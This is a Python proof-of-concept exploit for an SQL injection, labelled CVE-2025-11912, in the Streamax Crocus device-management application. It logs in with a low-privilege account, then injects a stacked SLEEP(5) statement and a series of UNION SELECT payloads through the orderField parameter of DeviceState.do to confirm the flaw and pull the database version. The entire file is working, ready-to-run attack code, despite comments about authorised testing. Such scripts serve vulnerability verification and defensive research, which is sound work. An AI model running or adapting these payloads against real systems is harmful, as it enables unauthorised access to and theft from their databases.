#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CVE-2025-11912 - Streamax Crocus SQL Injection PoC
Vulnerable endpoint: /DeviceState.do?Action=Query
Vulnerable parameter: orderField
Author: Security Researcher
"""
import requests
import sys
import urllib.parse
# Base URL (scheme, host and port, no trailing slash) that main() hands to
# every helper as base_url. Placeholder value: set it before running, and only
# point it at a system you are explicitly authorized to test.
TARGET_URL = "http://target:8080"
# Credentials that login() submits as the "userName" / "password" form fields.
# Placeholder values: replace with the test account for the engagement.
USERNAME = "low_priv_user"
PASSWORD = "password123"
def login(session, base_url):
    """Authenticate so that later requests on ``session`` are logged in.

    Posts the module-level USERNAME and PASSWORD as form fields to
    ``/Login.do?Action=Login`` with a 10 second timeout.

    Args:
        session: ``requests.Session``-like object used to send the request.
        base_url: Scheme/host/port prefix of the target, without a trailing
            slash.

    Returns:
        True when the server answers with HTTP 200, False otherwise.
        NOTE(review): only the status code is inspected; whether the
        application also returns 200 for rejected credentials is not
        visible from this file.
    """
    credentials = {"userName": USERNAME, "password": PASSWORD}
    response = session.post(
        f"{base_url}/Login.do?Action=Login",
        data=credentials,
        timeout=10,
    )
    return response.status_code == 200
def exploit_sqli(session, base_url):
    """Send a single time-delay probe through the ``orderField`` parameter.

    The probe is URL-encoded and appended to the ``DeviceState.do`` query
    URL, then requested with a 15 second timeout. Status, body length and
    the first 500 characters of the body are printed when a response
    arrives.

    Args:
        session: ``requests.Session``-like object (expected to be logged in).
        base_url: Scheme/host/port prefix of the target, without a trailing
            slash.

    Returns:
        The response object when the request completes; None when it times
        out or any other exception is raised.
    """
    # Stacked statement that asks the database to pause for five seconds.
    probe = "id;SELECT SLEEP(5)-- "
    quoted_probe = urllib.parse.quote(probe)
    url = f"{base_url}/DeviceState.do?Action=Query&orderField={quoted_probe}"
    try:
        response = session.get(url, timeout=15)
        print(f"[+] Response status: {response.status_code}")
        body = response.text
        print(f"[+] Response length: {len(body)}")
        print(f"[+] Response preview: {body[:500]}")
        return response
    except requests.exceptions.Timeout:
        # A request exceeding the client timeout is reported as a positive.
        print("[+] Timeout detected - SQL injection confirmed (time-based)")
        return None
    except Exception as err:
        print(f"[-] Error: {err}")
        return None
def union_injection(session, base_url):
    """Probe ``orderField`` with UNION SELECT lists of one to five columns.

    Each candidate is requested in turn. The first one answered with HTTP
    200 and a body that does not contain "error" (case-insensitive) is
    reported; a follow-up request with ``,version()`` appended to that
    candidate's select list is then sent and the first 300 characters of
    its body are printed. Remaining candidates are not tried.

    Args:
        session: ``requests.Session``-like object (expected to be logged in).
        base_url: Scheme/host/port prefix of the target, without a trailing
            slash.

    Returns:
        None. Results are only printed. Exceptions raised by the requests
        are not caught here.
    """

    def query_url(order_field):
        # URL-encode the value and attach it to the query endpoint.
        quoted = urllib.parse.quote(order_field)
        return f"{base_url}/DeviceState.do?Action=Query&orderField={quoted}"

    candidates = (
        "id UNION SELECT 1-- ",
        "id UNION SELECT 1,2-- ",
        "id UNION SELECT 1,2,3-- ",
        "id UNION SELECT 1,2,3,4-- ",
        "id UNION SELECT 1,2,3,4,5-- ",
    )
    for candidate in candidates:
        probe = session.get(query_url(candidate), timeout=10)
        if probe.status_code != 200 or "error" in probe.text.lower():
            continue
        print(f"[+] Valid column count with payload: {candidate}")
        # Drop the trailing comment marker, add version() and re-terminate.
        with_version = candidate.replace("-- ", "") + ",version()-- "
        version_resp = session.get(query_url(with_version), timeout=10)
        print(f"[+] DB version info: {version_resp.text[:300]}")
        return
def main():
    """Run the proof of concept against TARGET_URL.

    Creates a session with a browser-like User-Agent, logs in, and on
    success runs exploit_sqli() followed by union_injection(). Only run this
    against systems you are authorized to test.

    Returns:
        0 when login succeeded and both checks ran to completion; 1 when
        login was rejected or a request failed with a network-level error.
    """
    # The context manager closes the session's pooled connections on exit.
    with requests.Session() as session:
        session.headers.update({
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
        })
        print(f"[*] Target: {TARGET_URL}")
        print("[*] Attempting login...")
        try:
            if not login(session, TARGET_URL):
                print("[-] Login failed")
                return 1
            print("[+] Login successful")
            print("[*] Testing SQL injection...")
            exploit_sqli(session, TARGET_URL)
            print("[*] Attempting UNION injection...")
            union_injection(session, TARGET_URL)
        except requests.exceptions.RequestException as exc:
            # login() and union_injection() do not catch connection errors or
            # timeouts themselves; report them instead of dumping a traceback.
            print(f"[-] Request failed: {exc}")
            return 1
    return 0


if __name__ == "__main__":
    # Propagate main()'s status so callers can detect a failed run.
    sys.exit(main())